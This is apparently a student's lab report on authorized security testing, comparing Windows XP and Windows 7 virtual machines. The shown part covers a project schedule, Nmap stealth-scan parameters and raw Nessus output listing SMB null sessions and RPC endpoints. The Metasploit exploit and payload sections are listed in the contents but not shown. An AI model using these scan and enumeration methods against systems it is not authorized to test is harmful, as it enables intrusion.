0% found this document useful (0 votes)

405 views

Enterprise Architecture Testing

The document discusses testing the security of Windows XP and Windows 7 by establishing an infrastructure in a virtual lab, scanning for vulnerabilities with tools like Nmap and Nessus, and exploiting vulnerabilities with Metasploit. The goal is to determine which operating system is more secure and identify security issues in Windows 7 that were previously addressed in Windows XP.

Uploaded by

bendahl

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

405 views

Enterprise Architecture Testing

Uploaded by

bendahl

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 73

VANTAGE POINT COMPUTING

BEN DAHL

Purpose .............................................................................................................................................................................................................................................. 3 Schedule ............................................................................................................................................................................................................................................ 4 Acquisitions ..................................................................................................................................................................................................................................... 5 Installation ....................................................................................................................................................................................................................................... 6 Patch Management and Configuration ............................................................................................................................................................................... 9 Network Discovery (NMap) ................................................................................................................................................................................................... 12 Network Map .......................................................................................................................................................................................................................... 12 Windows 7 ............................................................................................................................................................................................................................... 14 Windows 7 ............................................................................................................................................................................................................................... 22 Exploits ...................................................................................................................................................................................................................................... 59 Microsoft Server Service Relative Path Stack Corruption........................................................................................................................... 59 Internet Explorer XML Core Services HTTP Request Handling ............................................................................................................... 60 Payloads .................................................................................................................................................................................................................................... 62 Windows Meterpreter (Reflective Injection), Bind TCP Stager ............................................................................................................... 62 Windows Meterpreter (Reflective Injection), Reverse TCP Stager ........................................................................................................ 62 Windows XP ............................................................................................................................................................................................................................ 63 Test 1 .................................................................................................................................................................................................................................... 63 Test 2 .................................................................................................................................................................................................................................... 63 Test 3 .................................................................................................................................................................................................................................... 64 Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution...................................................................................... 61 Windows XP ............................................................................................................................................................................................................................ 15 Windows XP ............................................................................................................................................................................................................................ 13

CONTENTS

Vulnerability Scanning (Nessus) ......................................................................................................................................................................................... 15 Penetration Testing (Metasploit) ........................................................................................................................................................................................ 59

Test 4 .................................................................................................................................................................................................................................... 64 Test 5 .................................................................................................................................................................................................................................... 65 Test 6 .................................................................................................................................................................................................................................... 65

Windows 7 ............................................................................................................................................................................................................................... 67

Test 1 .................................................................................................................................................................................................................................... 67 Test 2 .................................................................................................................................................................................................................................... 67 Test 3 .................................................................................................................................................................................................................................... 68 Test 4 .................................................................................................................................................................................................................................... 68 Test 5 .................................................................................................................................................................................................................................... 69 Test 6 .................................................................................................................................................................................................................................... 71

Conclusion ...................................................................................................................................................................................................................................... 72

PAGE | 2

PURPOSE
Information is the most critical asset in any organization. Proprietary data, information, and knowledge are just as valuable to a business as tangible assets. As such, information needs to be suitably protected and secured in a fashion as rigorous as that of other business assets. This is especially important with the increasing number of vulnerabilities and threats and the interconnected nature of the business environment.

The Windows Operating Environment is the most common environment in the corporate world. Currently, Windows XP represents the largest share of the market, but Windows 7 looms on the horizon. Given a clean installation of the Windows Operating Environment and physical access to the network, which operating system, Windows XP or Windows 7, is more secure?

Evaluation will be done in a manner similar to IS433 and IS533 classes at DePaul. In concurrence with the following schedule, an infrastructure will be established and verified. This will be followed by testing with NMAP, Nessus, and Metasploit to determine the potential vulnerabilities and then test their weaknesses. Ultimately, the final goal is to verify the security of the two Windows versions. Windows XP has been tested, patched, and service packed over the course of almost a decade. Windows 7 has been publicly available for less than a year. Did Microsoft learn from their mistakes with Windows XP? Are all the vulnerabilities that were patched throughout the lifecycle of Windows XP still secure, or are they open in Windows 7? Furthermore, is the upgrade to Windows 7 recommended for enterprise use, or only for home use? Throughout the course of testing these questions, along with many others will be answered.

In order to execute this scenario, a lab environment will be created for testing purposes. The lab will consist of one physical server with VirtualBox and two virtual machines. One virtual machine will have Windows XP and the other will have Windows 7 (Both acquired through DePaul via the MSDNAA). All tests will be performed with NETLAB (the physical server) in a manner similar to those used in the Vantage Point Computing Security Policy.

PAGE | 3

Week One: Acquisitions

o o o o

SCHEDULE

Week Two: Installation

o o o

Acquire two lab machines Acquire switch and cables Acquire Windows XP Acquire Windows 7 Deliverable: Lab Environment pictures Install Windows 7 Install Windows XP Verify network connectivity of lab machines Deliverable: Windows Desktop Screenshots

Week Three: Patch Management & Configuration

o o o o Install latest Windows 7 patches Install latest Windows XP patches Verify network connectivity of WHEELJACK Verify functionality of testing tools on WHEELJACK Deliverable: netstat ano screenshots Execute NMAP scans to map network Deliverable: NMAP network map Deliverable: NMAP Report Draft Run Nessus scans on Windows XP Run Nessus scans on Windows 7 Deliverable: Nessus Report Files Deliverable: Nessus Report Draft

Week Four & Five: NMAP

Week Six & Seven: Nessus

o o

Week Eight & Nine: Metasploit

o o Run Metasploit against Windows XP Run Metasploit against Windows 7 Deliverable: Metasploit console screenshots Deliverable: Metasploit Report Draft Final testing Revisions Deliverable: Final project report

Week Ten:
o o

PAGE | 4

o Acquire two lab machines o Acquire switch and cables o Acquire Windows XP o Acquire Windows 7

ACQUISITIONS

As opposed to acquiring two separate lab machines, and after discussions with James Krev, the acquisitions assignment was modified to reflect virtualization using Sun VirtualBox. VirtualBox was installed on a physical server (NETLAB) running Windows XP.

Additionally, Windows XP and Windows 7 were downloaded and installed as separate virtual instances within VirtualBox.

PAGE | 5

o Install Windows 7 o Install Windows XP o Verify network connectivity of lab machines

INSTALLATION

Windows7: ipconfig /all To verify network connectivity and acquisition of an IP address.

The following screenshots depict the virtual installations of Windows 7.

PAGE | 6

Windows7: netstat ano Displays open ports and Process IDs.

The following screenshots depict the virtual installations of Windows XP.

WindowsXP: ipconfig /all To verify network connectivity and acquisition of an IP address.

PAGE | 7

WindowsXP: netstat ano Displays open ports and Process IDs.

PAGE | 8

o Install latest Windows 7 patches o Install latest Windows XP patches o Verify network connectivity of NETLAB o Verify functionality of testing tools on NETLAB

PATCH MANAGEMENT AND CONFIGURATION

The following screenshot depicts the virtual installations of Windows 7.

Windows7: Windows Update To verify the operating system is patched to the most recent version.

PAGE | 9

The following screenshot depicts the virtual installations of Windows XP.

WindowsXP: Windows Update To verify the operating system is patched to the most recent version.

NETLAB: ipconfig/all To verify network connectivity.

The following screenshots depict the NETLAB server.

PAGE | 10

NETLAB: Tools (Nessus / NMap / Metasploit)

PAGE | 11

NMap was used to create a complete network topology of the local area network that NETLAB (including the virtual machines) is part of. Local Address 192.168.0.166 is the IP address of the Windows XP virtual machine. Local Address 192.168.0.171 is the IP address of the Windows 7 virtual machine. NMap was used with the following parameters: -p1-65535 - Used to specify ports 1-65535 -T4 - Used to specify the timing of the scans -sS - Specifies NMap runs in stealth syn mode. 192.168.0.1/24 - Scans all hosts on the local network to create the map. 192.168.0.166 - Scans the Windows XP virtual machine. 192.168.0.171 - Scans the Windows XP virtual machine.

NETWORK DISCOVERY (NMAP)

NETWORK MAP

PAGE | 12

The NMap scan of Windows XP revealed 65535 scanned ports, all of which were filtered.

WINDOWS XP

PAGE | 13

The NMap scan of the Windows 7 virtual machine scanned 65535 ports, 7 of which were open.

WINDOWS 7

PAGE | 14

VULNERABILITY SCANNING (NESSUS)

192.168.0.166
Scan time :

WINDOWS XP

Start time : End time :

Mon Nov 23 14:14:17 2009 Mon Nov 23 14:14:41 2009 Open ports : 5 8 0 0

Number of vulnerabilities :

Medium :

Low :

High :

Information about the remote host :

Operating system :

NetBIOS name :

(unknown) (unknown)

DNS name :

WINXP

PAGE | 15

Port netbios-ns (137/udp) Using NetBIOS or SMB to retrieve information from a Windows host Synopsis : It is possible to obtain the network name of the remote host. Description : The remote host listens on UDP port 137 or TCP port 445 and replies to NetBIOS nbtscan or SMB requests. Note that this plugin gathers information to be used in other plugins but does not itself generate a report. Solution : n/a

Risk factor : None

Plugin output : The following 6 NetBIOS names have been gathered : WINXP = Computer name WORKGROUP = Workgroup / Domain name WINXP = File Server Service WORKGROUP = Browser Service Elections WORKGROUP = Master Browser __MSBROWSE__ = Master Browser

The remote host has the following MAC address on its adapter : 08:00:27:09:16:8a Nessus ID : 10150

PAGE | 16

Port microsoft-ds (445/tcp) SMB Detection Synopsis : A file / print sharing service is listening on the remote host. Description : The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. Solution : n/a

Risk factor : None

Plugin output : A CIFS server is running on this port. Nessus ID : 11011

SMB NativeLanMan Synopsis : It is possible to obtain information about the remote operating system. Description : It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. Solution :

PAGE | 17

n/a

Risk factor : None

Plugin output : The remote Operating System is : Windows 5.1 The remote native lan manager is : Windows 2000 LAN Manager The remote SMB Domain Name is : WINXP Nessus ID : 10785 SMB log in Synopsis : It is possible to log into the remote host. Description : The remote host is running one of the Microsoft Windows operating systems. It was possible to log into it using one of the following account : - NULL session - Guest account - Given Credentials See also :

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP Solution : n/a

Risk factor : None

PAGE | 18

Plugin output : - NULL sessions are enabled on the remote host

CVE : CVE-1999-0504, CVE-1999-0505, CVE-1999-0506, CVE-2000-0222, CVE-2002-1117, CVE-2005-3595 BID : 494, 990, 11199 Nessus ID : 10394 SMB LanMan Pipe Server browse listing Synopsis : It is possible to obtain network information. Description : It was possible to obtain the browse list of the remote Windows system by send a request to the LANMAN pipe. The browse list is the list of the nearest Windows systems of the remote host. Solution : n/a

Risk factor : None

Plugin output : Here is the browse list of the remote host : WINXP ( os : 5.1 ) Other references : OSVDB:300 Nessus ID : 10397

PAGE | 19

SMB NULL session Synopsis : It is possible to log into the remote Windows host with a NULL session. Description : The remote host is running Microsoft Windows, and it was possible to log into it using a NULL session (ie, with no login or password). An unauthenticated remote attacker can leverage this issue to get information about the remote host. See also : http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP Solution : n/a

Risk factor : None

CVE : CVE-2002-1117 BID : 494 Nessus ID : 26920 SMB registry can not be accessed by the scanner Synopsis : Nessus is not able to access the remote Windows Registry. Description : It was not possible to connect to PIPE\winreg on the remote host. If you intend to use Nessus to perform registry-based checks, the

PAGE | 20

registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied credentials. Solution : n/a

Risk factor : None Nessus ID : 26917

Port epmap (135/tcp) Port icslap (2869/tcp) Port netbios-ssn (139/tcp) SMB Detection Synopsis : A file / print sharing service is listening on the remote host.

Description : The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. Solution : n/a

Risk factor : None

Plugin output : An SMB server is running on this port. Nessus ID : 11011

PAGE | 21

WINDOWS 7

192.168.0.171
Scan time :

Start time : End time :

Mon Nov 23 13:52:49 2009

Number of vulnerabilities :

Mon Nov 23 13:53:33 2009 Open ports : 12 16 0 0

Medium :

Low :

High :

Information about the remote host :

Operating system :

NetBIOS name :

(unknown) (unknown)

DNS name :

WIN7

PAGE | 22

Port unknown (49155/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available on TCP port 49155 : Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Remote RPC service TCP Port : 49155 IP : 192.168.0.171 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Remote RPC service TCP Port : 49155 IP : 192.168.0.171 Nessus ID : 10736

PAGE | 23

Risk factor : None

Plugin output : The following 6 NetBIOS names have been gathered : WIN7 = Computer name WORKGROUP = Workgroup / Domain name WIN7 = File Server Service WORKGROUP = Browser Service Elections WORKGROUP = Master Browser __MSBROWSE__ = Master Browser

The remote host has the following MAC address on its adapter : 08:00:27:ef:92:b3 Nessus ID : 10150

PAGE | 24

Port unknown (49156/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available on TCP port 49156 : Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 Description : Unknown RPC service Type : Remote RPC service TCP Port : 49156 IP : 192.168.0.171 Nessus ID : 10736

PAGE | 25

Port unknown (49153/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available on TCP port 49153 : Object UUID : 00000000-0000-0000-0000-000000000000 UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 Description : Unknown RPC service Annotation : Event log TCPIP Type : Remote RPC service TCP Port : 49153 IP : 192.168.0.171

PAGE | 26

UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 Description : DHCP Client Service Windows process : svchost.exe Annotation : DHCP Client LRPC Endpoint Type : Remote RPC service TCP Port : 49153 IP : 192.168.0.171 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 Description : Unknown RPC service Annotation : DHCPv6 Client LRPC Endpoint Type : Remote RPC service TCP Port : 49153 IP : 192.168.0.171

Port unknown (49154/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to

PAGE | 27

each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available on TCP port 49154 : Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 Description : Unknown RPC service Type : Remote RPC service TCP Port : 49154 IP : 192.168.0.171 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 Description : Unknown RPC service Annotation : IP Transition Configuration endpoint Type : Remote RPC service TCP Port : 49154 IP : 192.168.0.171

PAGE | 28

UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service TCP Port : 49154 IP : 192.168.0.171 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service TCP Port : 49154 IP : 192.168.0.171

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service TCP Port : 49154 IP : 192.168.0.171 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Remote RPC service TCP Port : 49154 IP : 192.168.0.171 Nessus ID : 10736

PAGE | 29

Port unknown (49152/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available on TCP port 49152 : Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 Description : Unknown RPC service Type : Remote RPC service TCP Port : 49152 IP : 192.168.0.171 Nessus ID : 10736

PAGE | 30

Risk factor : None

Plugin output : A CIFS server is running on this port. Nessus ID : 11011

DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution :

PAGE | 31

N/A

Risk factor : None

Plugin output : The following DCERPC services are available remotely :

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 Description : Unknown RPC service Type : Remote RPC service Named pipe : \PIPE\InitShutdown Netbios name : \\WIN7 Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 Description : Unknown RPC service Type : Remote RPC service Named pipe : \PIPE\InitShutdown Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0 Description : Unknown RPC service Type : Remote RPC service Named pipe : \pipe\trkwks Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Remote RPC service Named pipe : \pipe\lsass Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Remote RPC service Named pipe : \PIPE\protected_storage

PAGE | 32

Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 Description : Unknown RPC service Type : Remote RPC service Named pipe : \PIPE\atsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 Description : Unknown RPC service Annotation : IP Transition Configuration endpoint Type : Remote RPC service

PAGE | 33

Named pipe : \PIPE\atsvc Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 Description : Unknown RPC service Annotation : XactSrv service Type : Remote RPC service Named pipe : \PIPE\atsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\atsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\srvsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\browser Netbios name : \\WIN7

PAGE | 34

Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\srvsvc Netbios name : \\WIN7

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\browser Netbios name : \\WIN7

PAGE | 35

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\srvsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Remote RPC service Named pipe : \PIPE\browser Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Remote RPC service Named pipe : \PIPE\atsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Remote RPC service Named pipe : \PIPE\srvsvc Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Remote RPC service Named pipe : \PIPE\browser Netbios name : \\WIN7 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 Description : Unknown RPC service Annotation : Event log TCPIP Type : Remote RPC service Named pipe : \pipe\eventlog Netbios name : \\WIN7

PAGE | 36

SMB NativeLanMan Synopsis : It is possible to obtain information about the remote operating system. Description :

PAGE | 37

It is possible to get the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. Solution : n/a

Risk factor : None

Plugin output : The remote Operating System is : Windows 7 Professional 7600 The remote native lan manager is : Windows 7 Professional 6.1 The remote SMB Domain Name is : WIN7 Nessus ID : 10785 SMB log in Synopsis : It is possible to log into the remote host. Description : The remote host is running one of the Microsoft Windows operating systems. It was possible to log into it using one of the following account : - NULL session - Guest account - Given Credentials See also :

http://support.microsoft.com/support/kb/articles/Q143/4/74.ASP http://support.microsoft.com/support/kb/articles/Q246/2/61.ASP Solution :

PAGE | 38

n/a

Risk factor : None

Plugin output : - NULL sessions are enabled on the remote host

Risk factor : None

Plugin output : Here is the browse list of the remote host : WIN7 ( os : 6.1 ) Other references : OSVDB:300 Nessus ID : 10397

PAGE | 39

Risk factor : None

If you intend to use Nessus to perform registry-based checks, the registry checks will not work because the 'Remote Registry Access' service (winreg) has been disabled on the remote host or can not be connected to with the supplied

PAGE | 40

credentials. Solution : n/a

Risk factor : None Nessus ID : 26917

Port epmap (135/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available locally :

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : WindowsShutdown

PAGE | 41

Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : WMsgKRpc0436C0 Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : WindowsShutdown Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : WMsgKRpc0436C0

Object UUID : 6d726574-7273-0076-0000-000000000000 UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 Description : Unknown RPC service Annotation : Impl friendly name Type : Local RPC service Named pipe : LRPC-c6a2c9660bb6328c4f Object UUID : 52ef130c-08fd-4388-86b3-6edf00000001 UUID : 12e65dd8-887f-41ef-91bf-8d816c42c2e7, version 1.0 Description : Unknown RPC service Annotation : Secure Desktop LRPC interface Type : Local RPC service Named pipe : WMsgKRpc043881

Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : WMsgKRpc043881

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 Description : IPsec Services (Windows XP & 2003) Windows process : lsass.exe Annotation : IPSec Policy agent endpoint Type : Local RPC service Named pipe : LRPC-ca5f5144be75bc564b

PAGE | 42

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 Description : Unknown RPC service Annotation : Remote Fw APIs Type : Local RPC service Named pipe : LRPC-ca5f5144be75bc564b

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : OLE25D40AF7017C4837B051B3DE1DA2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b58aa02e-2884-4e97-8176-4ee06d794184, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : trkwks

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 8174bb16-571b-4c38-8386-1102b449044a, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : LRPC-92b6673cbb004993d5 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a2d47257-12f7-4beb-8981-0ebfa935c407, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : LRPC-92b6673cbb004993d5 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3f31c91e-2545-4b7b-9311-9529e8bffef6, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : LRPC-92b6673cbb004993d5

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 4b112204-0e19-11d3-b42b-0000f81feb9f, version 1.0 Description : SSDP service Windows process : unknow Type : Local RPC service Named pipe : LRPC-4348df7c4ffce47473

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0

PAGE | 43

Description : Unknown RPC service Annotation : Base Firewall Engine API Type : Local RPC service Named pipe : LRPC-5448665e392adc7390

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 Description : Unknown RPC service Annotation : Fw APIs Type : Local RPC service Named pipe : LRPC-5448665e392adc7390

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 Description : Unknown RPC service Annotation : Fw APIs Type : Local RPC service Named pipe : LRPC-5448665e392adc7390 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 Description : Unknown RPC service Annotation : Spooler function endpoint Type : Local RPC service Named pipe : spoolss

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 Description : Unknown RPC service Annotation : Spooler base remote object endpoint Type : Local RPC service Named pipe : spoolss

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 Description : Unknown RPC service Annotation : Spooler function endpoint Type : Local RPC service Named pipe : spoolss

PAGE | 44

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Local RPC service Named pipe : audit Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Local RPC service Named pipe : securityevent Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Local RPC service Named pipe : LSARPC_ENDPOINT Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Local RPC service Named pipe : lsapolicylookup Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Local RPC service Named pipe : lsasspirpc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager Windows process : lsass.exe Type : Local RPC service Named pipe : protected_storage Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 Description : Security Account Manager

PAGE | 45

Windows process : lsass.exe Type : Local RPC service Named pipe : samss lpc

